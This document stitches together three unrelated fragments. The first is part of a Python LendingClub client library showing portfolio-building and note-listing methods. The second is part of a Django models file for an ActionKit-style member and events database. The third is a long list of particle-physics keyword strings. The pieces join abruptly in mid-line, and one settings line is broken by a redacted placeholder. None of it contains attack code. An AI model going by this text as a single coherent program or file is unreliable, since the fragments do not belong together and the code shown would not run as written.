do_not_clear_staging : boolean, optional
Similar to automatically_invest, don't do this unless you know what you're doing.
Setting this to True stops the method from clearing the loan staging area before returning
Returns
-------
dict
A dict representing a new portfolio or False if nothing was found.
If `automatically_invest` was set to `True`, the dict will contain an `order_id` key with
the ID of the completed investment order.
Notes
-----
**The min/max_percent parameters**
When searching for portfolios, these parameters will match a portfolio of loan notes which have
an **AVERAGE** percent return between these values. If there are multiple portfolio matches, the
one closes to the max percent will be chosen.
Examples
--------
Here we want to invest $400 in a portfolio with only B, C, D and E grade notes with an average overall return between 17% - 19%. This similar to finding a portfolio in the 'Invest' section on lendingclub.com::
>>> from lendingclub import LendingClub
>>> from lendingclub.filters import Filter
>>> lc = LendingClub()
>>> lc.authenticate()
Email:<EMAIL>
Password:
True
>>> filters = Filter() # Set the search filters (only B, C, D and E grade notes)
>>> filters['grades']['C'] = True
>>> filters['grades']['D'] = True
>>> filters['grades']['E'] = True
>>> lc.get_cash_balance() # See the cash you have available for investing
463.80000000000001
>>> portfolio = lc.build_portfolio(400, # Invest $400 in a portfolio...
min_percent=17.0, # Return percent average between 17 - 19%
max_percent=19.0,
max_per_note=50, # As much as $50 per note
filters=filters) # Search using your filters
>>> len(portfolio['loan_fractions']) # See how many loans are in this portfolio
16
>>> loans_notes = portfolio['loan_fractions']
>>> order = lc.start_order() # Start a new order
>>> order.add_batch(loans_notes) # Add the loan notes to the order
>>> order.execute() # Execute the order
1861880
Here we do a similar search, but automatically invest the found portfolio. **NOTE** This does not allow
you to review the portfolio before you invest in it.
>>> from lendingclub import LendingClub
>>> from lendingclub.filters import Filter
>>> lc = LendingClub()
>>> lc.authenticate()
Email:<EMAIL>
Password:
True
# Filter shorthand
>>> filters = Filter({'grades': {'B': True, 'C': True, 'D': True, 'E': True}})
>>> lc.get_cash_balance() # See the cash you have available for investing
463.80000000000001
>>> portfolio = lc.build_portfolio(400,
min_percent=17.0,
max_percent=19.0,
max_per_note=50,
filters=filters,
automatically_invest=True) # Same settings, except invest immediately
>>> portfolio['order_id'] # See order ID
1861880
"""
assert filters is None or isinstance(filters, Filter), 'filter is not a lendingclub.filters.Filter'
assert max_per_note >= 25, 'max_per_note must be greater than or equal to 25'
# Set filters
if filters:
filter_str = filters.search_string()
else:
filter_str = 'default'
# Start a new order
self.session.clear_session_order()
# Make request
payload = {
'amount': cash,
'max_per_note': max_per_note,
'filter': filter_str
}
self.__log('POST VALUES -- amount: {0}, max_per_note: {1}, filter: ...'.format(cash, max_per_note))
response = self.session.post('/portfolio/lendingMatchOptionsV2.action', data=payload)
json_response = response.json()
# Options were found
if self.session.json_success(json_response) and 'lmOptions' in json_response:
options = json_response['lmOptions']
# Nothing found
if type(options) is not list or json_response['numberTicks'] == 0:
self.__log('No lending portfolios were returned with your search')
return False
# Choose an investment option based on the user's min/max values
i = 0
match_index = -1
match_option = None
for option in options:
# A perfect match
if option['percentage'] == max_percent:
match_option = option
match_index = i
break
# Over the max
elif option['percentage'] > max_percent:
break
# Higher than the minimum percent and the current matched option
elif option['percentage'] >= min_percent and (match_option is None or match_option['percentage'] < option['percentage']):
match_option = option
match_index = i
i += 1
# Nothing matched
if match_option is None:
self.__log('No portfolios matched your percentage requirements')
return False
# Mark this portfolio for investing (in order to get a list of all notes)
payload = {
'order_amount': cash,
'lending_match_point': match_index,
'lending_match_version': 'v2'
}
self.session.get('/portfolio/recommendPortfolio.action', query=payload)
# Get all loan fractions
payload = {
'method': 'getPortfolio'
}
response = self.session.get('/data/portfolio', query=payload)
json_response = response.json()
# Extract fractions from response
fractions = []
if 'loanFractions' in json_response:
fractions = json_response['loanFractions']
# Normalize by converting loanFractionAmount to invest_amount
for frac in fractions:
frac['invest_amount'] = frac['loanFractionAmount']
# Raise error if amount is greater than max_per_note
if frac['invest_amount'] > max_per_note:
raise LendingClubError('ERROR: LendingClub tried to invest ${0} in a loan note. Your max per note is set to ${1}. Portfolio investment canceled.'.format(frac['invest_amount'], max_per_note))
if len(fractions) == 0:
self.__log('The selected portfolio didn\'t have any loans')
return False
match_option['loan_fractions'] = fractions
# Validate that fractions do indeed match the filters
if filters is not None:
filters.validate(fractions)
# Not investing -- reset portfolio search session and return
if automatically_invest is not True:
if do_not_clear_staging is not True:
self.session.clear_session_order()
# Invest in this porfolio
elif automatically_invest is True: # just to be sure
order = self.start_order()
# This should probably only be ever done here...ever.
order._Order__already_staged = True
order._Order__i_know_what_im_doing = True
order.add_batch(match_option['loan_fractions'])
order_id = order.execute()
match_option['order_id'] = order_id
return match_option
else:
raise LendingClubError('Could not find any portfolio options that match your filters', response)
return False
def my_notes(self, start_index=0, limit=100, get_all=False, sort_by='loanId', sort_dir='asc'):
"""
Return all the loan notes you've already invested in. By default it'll return 100 results at a time.
Parameters
----------
start_index : int, optional
The result index to start on. By default only 100 records will be returned at a time, so use this
to start at a later index in the results. For example, to get results 200 - 300, set `start_index` to 200.
(default is 0)
limit : int, optional
The number of results to return per request. (default is 100)
get_all : boolean, optional
Return all results in one request, instead of 100 per request.
sort_by : string, optional
What key to sort on
sort_dir : {'asc', 'desc'}, optional
Which direction to sort
Returns
-------
dict
A dictionary with a list of matching notes on the `loans` key
"""
index = start_index
notes = {
'loans': [],
'total': 0,
'result': 'success'
}
while True:
payload = {
'sortBy': sort_by,
'dir': sort_dir,
'startindex': index,
'pagesize': limit,
'namespace': '/account'
}
response = self.session.post('/account/loansAj.action', data=payload)
json_response = response.json()
# Notes returned
if self.session.json_success(json_response):
notes['loans'] += json_response['searchresult']['loans']
notes['total'] = json_response['searchresult']['totalRecords']
# Error
else:
notes['result'] = json_response['result']
break
# Load more
if get_all is True and len(notes['loans']) < notes['total']:
index += limit
# End
else:
break
return notes
def get_note(self, note_id):
"""
Get a loan note that you've invested in by ID
Parameters
----------
note_id : int
The note ID
Returns
-------
dict
A dictionary representing the matching note or False
Examples
--------
>>> from lendingclub import LendingClub
>>> lc = LendingClub(email='<EMAIL>', password='<PASSWORD>')
>>> lc.authenticate()
True
>>> notes = lc.my_notes() # | |
[x.name for x in CoreUser._meta.local_fields]
qs.query.add_annotation(models.Count('actions__customfields__value'), 'actionval_count', is_summary=False)
xtrawhere = HavingGroupCondition(['count(DISTINCT {}.value, core_user.id) >= %s'.format(actionfield_alias)], (min_count,))
qs.query.where.add(xtrawhere, AND)
where2 = ExtraWhere(["{af}.name = %s".format(af=actionfield_alias)],(actionfield_name,))
qs.query.where.add(where2, AND)
if actionfield_value:
where3 = ExtraWhere(["{af}.value = %s".format(af=actionfield_alias)],(actionfield_value,))
qs.query.where.add(where3, AND)
if pages:
qs = qs.extra(where=['{}.page_id IN %s'.format(actionalias)], params=[pages])
if since_days:
since = timezone.now() - datetime.timedelta(days=since_days)
qs = qs.extra(where=['{}.created_at > %s'.format(actionalias)], params=[since])
#print('sql query', qs.query.sql_with_params()) #what SQL will we run?
return qs
@classmethod
def userfield_filter(cls, qs, userfield_name, userfield_value=None, min_count=1, search=False):
# note this is tweaked from the method above action_counts_filter
# min_count is *mostly* useless, but i think it does actually store multiple user values occasionally, or always.
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
uf_alias = qs.query.join(Join('core_userfield', qs.query.get_initial_alias(), 'core_userfield', INNER,
CoreUser._meta.fields_map['customfields'], False))
#group by everything except our aggregate annotation
# this is generically problematic, because if we need to group by other things,
# then this will fail
qs.query.group_by = [x.name for x in CoreUser._meta.local_fields]
qs.query.add_annotation(models.Count('customfields__name'), 'uf_count', is_summary=False)
xtrawhere = HavingGroupCondition(['count(DISTINCT {}.value, core_user.id) >= %s'.format(uf_alias)], (min_count,))
qs.query.where.add(xtrawhere, AND)
where2 = ExtraWhere(["{uf}.name = %s".format(uf=uf_alias)],(userfield_name,))
qs.query.where.add(where2, AND)
if userfield_value:
op = '=' if not search else 'LIKE'
where3 = ExtraWhere(["{uf}.value {op} %s".format(uf=uf_alias, op=op)],(userfield_value,))
qs.query.where.add(where3, AND)
#print('sql query', qs.query.sql_with_params()) #what SQL will we run?
return qs
@classmethod
def add_location_to_queryset(cls, qs):
"""
Joins core_location to the query
"""
qa = qs.query.join(Join('core_location', qs.query.get_initial_alias(), 'core_location', LOUTER,
CoreUser._meta.fields_map['location'], True))
qs = qs.extra(select={
'us_district': '%s.us_district'.format(qa=qa),
})
return qs
@classmethod
def add_phone_to_queryset(cls, qs, no_groupby=False):
"""
Adds the first phone number to the queryset (probably MySQL dependent on first-row no-fussing)
"""
phone_alias = qs.query.join(Join('core_phone', qs.query.get_initial_alias(), 'core_phone', LOUTER,
CoreUser._meta.fields_map['phones'], True))
if not no_groupby:
#group by everything except our aggregate annotation (bad general assumption)
qs.query.group_by = [x.name for x in CoreUser._meta.local_fields]
qs = qs.extra(select={
'first_phone': '%s.normalized_phone' % phone_alias,
'first_phone_type': '%s.type' % phone_alias,
'first_phone_source': '%s.source' % phone_alias,
})
return qs
@classmethod
def add_userfield_to_queryset(cls, qs, userfieldname, userfieldvalue=None):
"""
Adds a userfield to a user queryset, possibly conditional on userfieldvalue
"""
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
uf_alias = qs.query.join(Join('core_userfield', qs.query.get_initial_alias(), 'core_userfield', LOUTER,
JoinField(CoreUser._meta.fields_map['customfields'], userfieldname, customval=userfieldvalue), True))
userattr = 'userfield_%s' % userfieldname
qs = qs.extra(select={userattr: '%s.value' % uf_alias})
return qs
@classmethod
def add_usergeofield_to_queryset(cls, qs, userfieldname, userfieldvalue=None):
"""
Adds a usergeofield to a user queryset, possibly conditional on userfieldvalue
"""
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
uf_alias = qs.query.join(Join('core_usergeofield', qs.query.get_initial_alias(), 'core_usergeofield', LOUTER,
JoinField(CoreUser._meta.fields_map['customfields'], userfieldname, customval=userfieldvalue), True))
userattr = 'usergeofield_%s' % userfieldname
qs = qs.extra(select={userattr: '%s.value' % uf_alias})
return qs
@classmethod
def action_value_filter(cls, qs, fieldname, min_count=1, since_days=None):
return qs
class CoreUser(_akit_model):
objects = CoreUserManager()
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
email = models.TextField(max_length=765, unique=True)
prefix = models.CharField(max_length=765)
first_name = models.CharField(max_length=765)
middle_name = models.CharField(max_length=765)
last_name = models.CharField(max_length=765)
suffix = models.CharField(max_length=765)
password = models.CharField(max_length=765)
subscription_status = models.CharField(max_length=765)
address1 = models.CharField(max_length=765)
address2 = models.CharField(max_length=765)
city = models.CharField(max_length=765)
state = models.CharField(max_length=765)
region = models.CharField(max_length=765)
postal = models.CharField(max_length=765)
zip = models.CharField(max_length=15)
plus4 = models.CharField(max_length=12)
country = models.CharField(max_length=765)
source = models.CharField(max_length=765)
lang = models.ForeignKey('CoreLanguage', null=True, blank=True, on_delete=models.DO_NOTHING)
rand_id = models.IntegerField()
# This allows filter queries like this:
# CoreUser.objects.filter(zipproximity__nearby='10025', zipproximity__distance__lte=5)
zipproximity = models.ForeignObject('ZipProximity', on_delete=models.DO_NOTHING,
from_fields=['zip'], to_fields=['zip'],
related_name='user')
# Return Fields As A Dictionary
def custom_fields(self):
fields = {}
for x in CoreUserfield.objects.filter(parent_id=self):
fields[x.name_id] = x.value
return fields
# Return Userfields As A Queryset
def fields(self):
return CoreUserfield.objects.filter(parent_id=self)
def actions(self):
return CoreAction.objects.select_related().filter(user_id=self)
def __str__(self):
return u'%s %s' % (self.first_name, self.last_name)
def recent_phone(self):
#get's most recent phone and parses makes it readable
return getattr(self.phones.order_by('-updated_at').first(), 'normalized_phone', None)
class Meta(_akit_model.Meta):
db_table = 'core_user'
verbose_name_plural = 'Member Search'
permissions = (
("csvswap", "Use CSV Swap to get member data"),
)
def api_save(self, **kwargs):
class aksettings:
AK_USER = settings.AK_USER
AK_PASSWORD = settings.AK_PASSWORD
AK_BASEURL = settings.AK_BASEURL
DEBUG = False
akapi = AKUserAPI(aksettings)
if kwargs:
if self.id:
res = akapi.update_user(self.id, kwargs)
elif 'email' in kwargs:
res = akapi.create_user(kwargs)
class CoreUserfield(_akit_model):
parent = models.ForeignKey('CoreUser', related_name='customfields', on_delete=models.DO_NOTHING)
name = models.CharField(max_length=765)
value = models.CharField(max_length=65535)
class Meta(_akit_model.Meta):
db_table = u'core_userfield'
def __str__(self):
return self.value
def api_save(self, **kwargs):
class aksettings:
AK_USER = settings.AK_USER
AK_PASSWORD = <PASSWORD>.<PASSWORD>
AK_BASEURL = settings.AK_BASEURL
DEBUG = False
akapi = AKUserAPI(aksettings)
res = akapi.set_usertag(self.parent_id, {self.name: self.value})
class CoreUsermailing(_akit_model):
mailing = models.ForeignKey('CoreMailing', on_delete=models.DO_NOTHING)
user = models.ForeignKey('CoreUser', on_delete=models.DO_NOTHING)
subject = models.ForeignKey('CoreMailingsubject', null=True, blank=True, on_delete=models.DO_NOTHING)
created_at = models.DateTimeField()
class Meta(_akit_model.Meta):
db_table = u'core_usermailing'
class CoreUseroriginal(_akit_model):
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
user = models.OneToOneField('CoreUser', primary_key=True, on_delete=models.DO_NOTHING)
address1 = models.CharField(max_length=765)
address2 = models.CharField(max_length=765)
city = models.CharField(max_length=765)
state = models.CharField(max_length=765)
zip = models.CharField(max_length=765)
address1_updated_at = models.DateTimeField(null=True, blank=True)
address2_updated_at = models.DateTimeField(null=True, blank=True)
city_updated_at = models.DateTimeField(null=True, blank=True)
state_updated_at = models.DateTimeField(null=True, blank=True)
zip_updated_at = models.DateTimeField(null=True, blank=True)
class Meta(_akit_model.Meta):
db_table = u'core_useroriginal'
class CoreUserupdateaction(CoreAction):
action = models.OneToOneField(CoreAction, parent_link=True, db_column='action_ptr_id', on_delete=models.DO_NOTHING)
class Meta(_akit_model.Meta):
db_table = u'core_userupdateaction'
class CoreUserupdatepage(CorePage):
page = models.OneToOneField(CorePage, parent_link=True, db_column='page_ptr_id', on_delete=models.DO_NOTHING)
class Meta(_akit_model.Meta):
db_table = u'core_userupdatepage'
class CoreZp4Queue(_akit_model):
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
user = models.ForeignKey('CoreUser', on_delete=models.DO_NOTHING)
class Meta(_akit_model.Meta):
db_table = u'core_zp4queue'
class DjangoAdminLog(_akit_model):
action_time = models.DateTimeField()
user = models.ForeignKey('AuthUser', on_delete=models.DO_NOTHING)
content_type = models.ForeignKey('DjangoContentType', null=True, blank=True, on_delete=models.DO_NOTHING)
object_id = models.TextField(blank=True)
object_repr = models.CharField(max_length=600)
action_flag = models.IntegerField()
change_message = models.TextField()
class Meta(_akit_model.Meta):
db_table = u'django_admin_log'
class DjangoContentType(_akit_model):
name = models.CharField(max_length=300)
app_label = models.TextField(max_length=300, unique=True)
model = models.TextField(max_length=300, unique=True)
class Meta(_akit_model.Meta):
db_table = u'django_content_type'
class DjangoSession(_akit_model):
session_key = models.CharField(max_length=120, primary_key=True)
session_data = models.TextField()
expire_date = models.DateTimeField()
class Meta(_akit_model.Meta):
db_table = u'django_session'
class EventsCampaign(_akit_model):
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
title = models.CharField(max_length=765)
name = models.TextField(max_length=765, unique=True)
public_create_page = models.IntegerField()
use_title = models.IntegerField()
default_title = models.CharField(max_length=765)
starts_at = models.DateTimeField(null=True, blank=True)
use_start_date = models.IntegerField()
use_start_time = models.IntegerField()
require_staff_approval = models.IntegerField()
require_email_confirmation = models.IntegerField()
allow_private = models.IntegerField()
max_event_size = models.IntegerField(null=True, blank=True)
default_event_size = models.IntegerField(null=True, blank=True)
public_search_page = models.IntegerField()
show_title = models.IntegerField()
show_venue = models.IntegerField()
show_address1 = models.IntegerField()
show_city = models.IntegerField()
show_state = models.IntegerField()
show_zip = models.IntegerField()
show_public_description = models.IntegerField()
show_directions = models.IntegerField()
show_attendee_count = models.IntegerField()
class Meta(_akit_model.Meta):
db_table = u'events_campaign'
verbose_name_plural = 'Event Campaigns'
ordering = ['-id'] #so recent campaigns are shown first
def __str__(self):
return '%s %s' % (
self.title,
self.starts_at.strftime('%m/%d/%y') if self.starts_at else '')
class EventsEventManager(models.Manager):
def public_search(self):
return self.__class__.filter_public_search(self.get_queryset())
@classmethod
def filter_public_search(cls, qs, allow_full=False):
query = qs.filter(is_private=0,
status="active",
host_is_confirmed=1
)
if not allow_full:
query = query.extra(where=['max_attendees > attendee_count'])
return query
@classmethod
def add_eventfield_to_queryset(cls, qs, fieldname, filtervalue=None):
"""
Adds the first phone number to the queryset (probably MySQL dependent on first-row no-fussing)
"""
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
query_alias = qs.query.join(Join('events_eventfield', qs.query.get_initial_alias(), 'events_eventfield', LOUTER,
JoinField(EventsEvent._meta.fields_map['customfields'], fieldname), True))
#group by everything except our aggregate annotation (bad general assumption)
qs.query.group_by = [x.name for x in EventsEvent._meta.local_fields]
if filtervalue:
where = "{qa}.value = %s"
qs.query.where.add(ExtraWhere([where.format(qa=query_alias)], [filtervalue]), AND)
fieldname_id = '%s_id' % fieldname
qs = qs.extra(select={
fieldname: '%s.value' % query_alias,
fieldname_id: '%s.id' % query_alias,
})
return qs
@classmethod
def add_creator_userfield_to_queryset(cls, qs, userfieldname):
"""
Adds the first phone number to the queryset (probably MySQL dependent on first-row no-fussing)
"""
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
uf_alias = qs.query.join(Join('core_userfield', qs.query.get_initial_alias(), 'core_userfield', LOUTER,
JoinField(CoreUser._meta.fields_map['customfields'], userfieldname,
cols=(('creator_id', 'parent_id'),)
), True))
userattr = 'userfield_%s' % userfieldname
qs = qs.extra(select={userattr: '%s.value' % uf_alias})
return qs
@classmethod
def filter_proximity(cls, qs, zip, radius, same_state=False):
"""
Joins on ZipProximity and then filters on radius
"""
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
query_alias = ZipJoin.add_to_queryset(qs)
qs.query.where.add(ExtraWhere(
['{qa}.nearby=%s AND {qa}.distance < %s AND {qa}.same_state IN %s'.format(qa=query_alias)],
[zip, radius, ( (True,) if same_state else (True, False))]
), AND)
qs = qs.extra(select={
'distance': '%s.distance' % query_alias,
'same_state': '%s.same_state' % query_alias,
})
return qs
class EventsEvent(_akit_model):
objects = EventsEventManager()
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
address1 = models.CharField(max_length=765)
address2 = models.CharField(max_length=765)
city = models.CharField(max_length=765)
state = models.CharField(max_length=765)
region = models.CharField(max_length=765)
postal = models.CharField(max_length=765)
zip = models.CharField(max_length=15)
plus4 = models.CharField(max_length=12)
country = models.CharField(max_length=765)
longitude = models.FloatField(null=True, blank=True)
latitude = models.FloatField(null=True, blank=True)
us_district = models.CharField(max_length=5, verbose_name="US district",
db_index=True)
campaign = models.ForeignKey('EventsCampaign', related_name='events', on_delete=models.DO_NOTHING)
title = models.CharField(max_length=765)
creator = models.ForeignKey('CoreUser', on_delete=models.DO_NOTHING)
starts_at = models.DateTimeField(null=True, blank=True)
ends_at = models.DateTimeField(null=True, blank=True)
starts_at_utc = models.DateTimeField(null=True, blank=True)
ends_at_utc = models.DateTimeField(null=True, blank=True)
status = models.CharField(max_length=96, choices=(('active', 'active'),
('cancelled', 'cancelled'),
('deleted', 'deleted'),
))
host_is_confirmed = models.IntegerField()
is_private = models.IntegerField(choices=((0, 'public'), (1, 'private')),
verbose_name="private or public")
is_approved = models.IntegerField()
attendee_count | |
Reissner-Nordstroem",
u"Coulomb",
u"form factor: vector",
u"anti-p p: scattering",
u"fusion",
u"quantum molecular dynamics: relativistic",
u"charmed meson",
u"calorimeter: hadronic",
u"nuclear matter: density",
u"Borel transformation",
u"compactification: torus",
u"photon nucleus: nuclear reaction",
u"field theory: scalar: massless",
u"temperature: transition",
u"gravitational radiation: particle source",
u"quark antiquark: bound state",
u"neutrino/tau",
u"space-time: fluctuation",
u"D*(2010): hadronic decay",
u"KLOE",
u"pi: production",
u"pi pi: elastic scattering",
u"anomaly: U(1)",
u"electron: electric moment",
u"meson: heavy",
u"alignment",
u"Slavnov identity",
u"minimal supersymmetric standard model: parameter space",
u"electron p: inelastic scattering",
u"beam dynamics",
u"modular",
u"gluon: polarization",
u"pseudoscalar meson: mass",
u"fabrication",
u"B+: hadronic decay",
u"atmosphere",
u"approximation: nonrelativistic",
u"absorption",
u"field theory: relativistic",
u"spin: orbit",
u"particle: acceleration",
u"hadron: mass",
u"axion: mass",
u"electromagnetic field: nonlinear",
u"ladder approximation",
u"splitting",
u"Higgs model: composite",
u"loop integral",
u"electronics",
u"readout",
u"flavor: dependence",
u"lepton: flavor",
u"expansion: strong coupling",
u"vector meson: photoproduction",
u"R-matrix",
u"compactification: orbifold",
u"Becchi-Rouet-Stora",
u"mass: twist",
u"J/psi(3100): hadronic decay",
u"black string",
u"dilepton: mass spectrum",
u"lepton: mixing",
u"decay modes",
u"chargino",
u"hydrogen",
u"<NAME>",
u"galaxy: rotation",
u"constraint: Hamiltonian",
u"radiation: electromagnetic",
u"black hole: hair",
u"gauge boson: pair production",
u"approximation: classical",
u"lepton nucleus: deep inelastic scattering",
u"track data analysis: vertex",
u"top: hadroproduction",
u"interpretation of experiments: CERN LEP Stor",
u"fermion: massive",
u"symmetry: crossing",
u"phase: topological",
u"specific heat",
u"mass: correction",
u"fermion: condensation",
u"fragmentation",
u"Schwinger model",
u"Skyrmion",
u"gluon: jet",
u"turbulence",
u"radiation",
u"quantum geometry",
u"Fermi gas",
u"gravitation: scalar",
u"W: hadronic decay",
u"space-time: foam",
u"low-energy constant",
u"current: axial",
u"bispectrum",
u"model: fluid",
u"quark: jet",
u"dark matter: coupling",
u"optics",
u"tau: decay",
u"photon p: inclusive reaction",
u"muon",
u"pi: exchange",
u"hyperon",
u"boson: statistics",
u"tau: radiative decay",
u"nucleon: model",
u"photon: structure function",
u"inflation: slow-roll approximation",
u"spin: 3/2",
u"color: confinement",
u"diquark: condensation",
u"gravitation: linear",
u"operator: local",
u"p: polarized target",
u"reflection",
u"string: topological",
u"superconductivity: color",
u"CLAS",
u"neutrino: superluminal",
u"gravitation: correction",
u"liquid",
u"muon: leptonic decay",
u"coupling: anomaly",
u"PCAC model",
u"mediation",
u"cross section: elastic scattering",
u"photon photon: scattering",
u"slepton: mass",
u"black hole: static",
u"collective",
u"final state: two-photon",
u"special relativity",
u"binary: coalescence",
u"cosmic radiation: propagation",
u"hybrid",
u"scalar: Ricci",
u"psi(3685)",
u"Mellin transformation",
u"Bogolyubov transformation",
u"color flavor locked phase",
u"solution: static",
u"gauge: abelian",
u"beam emittance",
u"cross section: measured",
u"quantum chromodynamics: light cone",
u"nuclear properties",
u"sparticle: pair production",
u"cosmic radiation: diffusion",
u"air",
u"statistical analysis: Bayesian",
u"gravitation: interaction",
u"amplitude analysis: decay",
u"field theory: Toda",
u"quark model: constituent",
u"ionization: yield",
u"field theory: massive",
u"stop: mass",
u"CERN CLIC",
u"J/psi(3100): electroproduction",
u"quark: hadroproduction",
u"neutrino electron: elastic scattering",
u"mass: screening",
u"annihilation",
u"a0(980)",
u"charmed meson: hadronic decay",
u"J/psi(3100): yield",
u"beam: energy",
u"multiplet: chiral",
u"p: spin",
u"mass: scalar",
u"quark model: chiral",
u"contact interaction",
u"epsilon expansion",
u"neutrino",
u"space-time: deformation",
u"symmetry breaking: flavor",
u"string model: Type IIB",
u"DELPHI",
u"correction: finite size",
u"neutrino nucleus: interaction",
u"gravitation: teleparallel",
u"fermion: dark matter",
u"energy: kinetic",
u"scaling: invariance",
u"crossing",
u"mass ratio",
u"electron nucleus: deep inelastic scattering",
u"neutrino nucleus: nuclear reaction",
u"inflaton: decay",
u"particle: spectrum",
u"gravitational radiation: background",
u"scale: grand unified theory",
u"elastic scattering",
u"quark: potential",
u"matter: power spectrum",
u"benchmark",
u"adiabatic",
u"muon: branching ratio",
u"path integral: measure",
u"hydrogen: atom",
u"lepton: branching ratio",
u"WIMP nucleus: elastic scattering",
u"MAGIC",
u"gauge field theory: tensor",
u"singlet",
u"Bayesian",
u"RF system",
u"computer: network",
u"mass: renormalization",
u"differential forms: 3",
u"fermion: coupling",
u"Regge",
u"small-angle",
u"precision measurement",
u"dark matter: scalar",
u"differential forms: symplectic",
u"fractal",
u"Cherenkov Telescope Array",
u"inflation: chaos",
u"quantum space",
u"dark matter: detector",
u"form factor: Sudakov",
u"dimension: 8",
u"p: lifetime",
u"hadron: multiplicity",
u"group: SU(2)",
u"beam monitoring",
u"particle: spin",
u"quantization: Batalin-Vilkovisky",
u"supersymmetry: minimal",
u"cohomology: Becchi-Rouet-Stora",
u"hydrodynamics: relativistic",
u"model: spin",
u"momentum transfer",
u"star: mass",
u"analyzing power",
u"baryon resonance: exotic",
u"new particle",
u"chameleon",
u"quark: mixing",
u"X-ray: emission",
u"nuclear force",
u"pi0: photoproduction",
u"accretion",
u"mass: scale",
u"potential: vector",
u"graviton: massive",
u"xenon: liquid",
u"quantization: deformation",
u"saddle-point approximation",
u"cosmic background radiation: polarization",
u"mathematical methods: variational",
u"photon: propagator",
u"jet: energy",
u"magnetic spectrometer",
u"bottom: mass",
u"sfermion: mass",
u"graviton: mass",
u"nuclear emulsion",
u"mass: gravitation",
u"sparticle: decay",
u"energy: gap",
u"electron nucleus: nuclear reaction",
u"formation",
u"underlying event",
u"tritium: semileptonic decay",
u"invariance: Poincare",
u"isometry",
u"group theory: geometrical",
u"deuterium",
u"hadron: mass spectrum",
u"charge conjugation",
u"error: statistical",
u"singlet: scalar",
u"K: rare decay",
u"multiplicity: fluctuation",
u"potential: gauge",
u"black hole: Kerr-Newman",
u"constraint: algebra",
u"J/psi(3100): radiative decay",
u"Phi(1020): hadronic decay",
u"Immirzi parameter",
u"beryllium",
u"electron: capture",
u"L3",
u"neutrino: path length",
u"graviton: exchange",
u"fractional",
u"vector meson: electroproduction",
u"p nucleus: interaction",
u"mass number: dependence",
u"space-time: static",
u"sphaleron",
u"quark: semileptonic decay",
u"neutrino/mu: beam",
u"showers: atmosphere",
u"standard model: validity test",
u"power spectrum: tensor",
u"spectrometer",
u"algebra: fusion",
u"RICH",
u"neutrino: supernova",
u"magnetization",
u"effective field theory: chiral",
u"polarized beam",
u"charmed meson: pair production",
u"supersymmetry: split",
u"time reversal",
u"pi: decay",
u"interaction: model",
u"baryon: oscillation: acoustic",
u"gluon: distribution function",
u"Fermi liquid",
u"symmetry breaking: U(1)",
u"asymmetry: time dependence",
u"cosmic radiation: interaction",
u"renormalization group: fixed point",
u"correlation function: two-particle",
u"supersymmetry: 8",
u"heavy ion",
u"phase space: Hilbert space",
u"top: branching ratio",
u"electromagnetic field: external field",
u"Z0: width",
u"kappa symmetry",
u"nucleus: structure function",
u"tension",
u"radio wave",
u"sum rule: light cone",
u"low-energy theorem",
u"flavor: mixing",
u"B-L number",
u"metal",
u"membrane",
u"gauge field theory: SU(3) x SU(3) x U(1)",
u"density: spectral",
u"model: lattice",
u"photon: off-shell",
u"conference summary",
u"boundary condition: twist",
u"Weyl",
u"shadowing",
u"gamma ray: background",
u"cascade",
u"interaction",
u"charge: fluctuation",
u"long-range",
u"group: Lorentz",
u"anti-p: cosmic radiation",
u"pi pi: scattering amplitude",
u"quark: fragmentation",
u"unitarity: violation",
u"coupling: conformal",
u"duality: quark hadron",
u"massive",
u"sparticle: electroproduction",
u"lepton: transverse momentum",
u"metric",
u"B: decay constant",
u"current: electromagnetic",
u"quantum mechanics: relativistic",
u"random phase approximation",
u"meson: exotic",
u"gluino",
u"invariance: reparametrization",
u"algebra: affine",
u"cosmic radiation: secondary",
u"tetrad",
u"B/s: branching ratio",
u"gluon: saturation",
u"synchrotron",
u"supergravity: 2",
u"showers",
u"eta: hadroproduction",
u"spinor: Dirac",
u"holonomy: G(2)",
u"transformation: modular",
u"D-term",
u"quantum mechanics: supersymmetry",
u"metric: perturbation",
u"beam optics",
u"scalar particle",
u"polarization: tensor",
u"pseudoscalar meson: decay constant",
u"baryon: multiplet",
u"Lambda: hadroproduction",
u"mixing: kinetic",
u"model: solar",
u"showers: spatial distribution",
u"dark matter: production",
u"operator: Becchi-Rouet-Stora",
u"gap equation",
u"photon: mass",
u"electron positron: inclusive reaction",
u"gauge boson: coupling",
u"channel cross section: correction",
u"quark: radiative decay",
u"vector boson: fusion",
u"parton: density",
u"sparticle",
u"X(3872)",
u"higher-twist",
u"momentum transfer: low",
u"parton: multiple scattering",
u"Daya Bay",
u"dark energy: interaction",
u"mass: pole",
u"nuclear reactor",
u"gluon: Regge",
u"black ring",
u"mass: bottom",
u"pi: condensation",
u"operator: dimension: 6",
u"pi: multiple production",
u"J/psi(3100): photoproduction",
u"gravitational radiation detector: interferometer",
u"meson: decay",
u"group: representation",
u"quantum electrodynamics: scalar",
u"pseudoscalar",
u"potential model",
u"model: hadronization",
u"time-of-flight",
u"background: anti-de Sitter",
u"representation: nonlinear",
u"Type IIB",
u"space-time: horizon",
u"tau: leptonic decay",
u"anthropic principle",
u"Cartan",
u"Lambda: polarization",
u"form factor: ratio",
u"electron positron: elastic scattering",
u"Sivers function",
u"organic compounds",
u"master integral",
u"vacuum: stability",
u"Darmstadt SIS",
u"energy: phantom",
u"electron: mass",
u"duality: string",
u"quarkonium: hadroproduction",
u"curvaton",
u"anti-B0: hadronic decay",
u"high energy behavior",
u"impulse approximation",
u"D: semileptonic decay",
u"hadron: yield",
u"VHE",
u"scintillation counter: plastics",
u"cross section: longitudinal",
u"gluino: pair production",
u"rapidity: density",
u"algebraic geometry",
u"peripheral",
u"space-time: anisotropy",
u"K+: semileptonic decay",
u"oscillation: acoustic",
u"Z0: mass",
u"Lambda(1405)",
u"quarkonium",
u"eta: photoproduction",
u"space: fuzzy",
u"magnetic field: effect",
u"quark: massless",
u"f0(600): mass",
u"hadron: model",
